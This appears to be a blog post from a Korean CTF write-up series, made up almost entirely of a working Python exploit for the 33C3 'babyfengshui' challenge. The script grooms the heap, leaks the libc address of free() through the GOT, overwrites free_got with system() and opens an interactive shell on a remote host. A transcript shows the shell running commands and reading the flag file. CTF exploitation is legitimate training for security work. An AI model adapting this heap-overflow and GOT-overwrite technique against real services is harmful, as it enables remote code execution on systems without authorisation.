728x90
#!/usr/bin/env python
import socket
import struct
import telnetlib
p = lambda x: struct.pack( "<I", x )
up = lambda x: struct.unpack( "<I", x )[0]
host = "78.46.224.83"
port = 1456
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect(( host, port ))
def u_recv( st ):
bf = ''
while st not in bf:
bf += s.recv( 1 )
return bf
## add a user
print "[+] add a user"
for i in range( 2 ):
u_recv( "Action: " )
s.send("0\n")
u_recv( "size of description: " )
s.send( "16\n" )
u_recv( "name: " )
s.send( "aaaa\n" )
u_recv( "text length: " )
s.send( "16\n" )
u_recv( "text: " )
s.send( "bbbb\n" )
## delete a user
print "[+] delete a user"
u_recv( "Action: " )
s.send( "1\n" )
u_recv( "index: " )
s.send( "0\n" )
## add a user
## overwrite any table
print "[+] overwrite the header of chunk"
u_recv( "Action: " )
s.send( "0\n" )
u_recv( "size of description: " )
s.send( "128\n" )
u_recv( "name: " )
s.send( "cccc\n" )
u_recv( "text length: " )
s.send( "164\n" )
u_recv( "text: " )
pay = "/bin/sh\x00"
pay += "a" * (160-len(pay))
pay += p( 0x804b010 ) # free
s.send( pay+"\n" )
u_recv( "Action: " )
s.send( "2\n" )
u_recv( "index: " )
s.send( "1\n" )
leak = u_recv( "Action: " )
leak = leak.split( "description: " )[1]
leak = up( leak[:4] ) # memory address free()
## libc_2.19.so
libc_base = leak - 0x000760f0
system = libc_base + 0x0003e3e0
binsh = libc_base + 0x15f551
print "[!] LIBC_BASE: %x, system: %x, binsh: %x" % (libc_base, system, binsh)
## owverwrite free_got to system()
print "[+] overwrite the free_got"
s.send( "3\n" )
u_recv( "index: " )
s.send( "1\n" )
u_recv( "text length: " )
s.send( "4\n" )
u_recv( "text: " )
s.send( p(system)+"\n" )
## trigger
print "[+] get the shell :D"
u_recv( "Action: " )
s.send( "1\n" )
u_recv( "index: " )
s.send( "2\n" )
t = telnetlib.Telnet()
t.sock = s
t.interact()
'''
blackcon@bk{~/33c3_ctf/pwn/babyfengshui}:./vuln.py
[+] add a user
[+] delete a user
[+] overwrite the header of chunk
[!] LIBC_BASE: f75de000, system: f761c3e0, binsh: f773d551
[+] overwrite the free_got
[+] get the shell :D
id
uid=1000(fengshui) gid=1000(fengshui) groups=1000(fengshui)
ls
babyfengshui
flag.txt
cat flag.txt
33C3_h34p_3xp3rts_c4n_gr00m_4nd_f3ng_shu1
'''728x90
'Security > [게임] CTF 풀이' 카테고리의 다른 글
| [Kinght CTF] Fix It Felix! writeup (0) | 2022.01.23 |
|---|---|
| [crypto] 2016 SecconCTF - Vigenere writeups (0) | 2016.12.12 |
| [exploit] 2016 SecconCTF - jmper writeups (exploit only) (0) | 2016.12.11 |
| [exploit] 2016 SecconCTF - cheer_msg writeups (exploit only) (0) | 2016.12.11 |
| [exploit] 2016 SecconCTF - checker writeups (exploit only) (0) | 2016.12.11 |
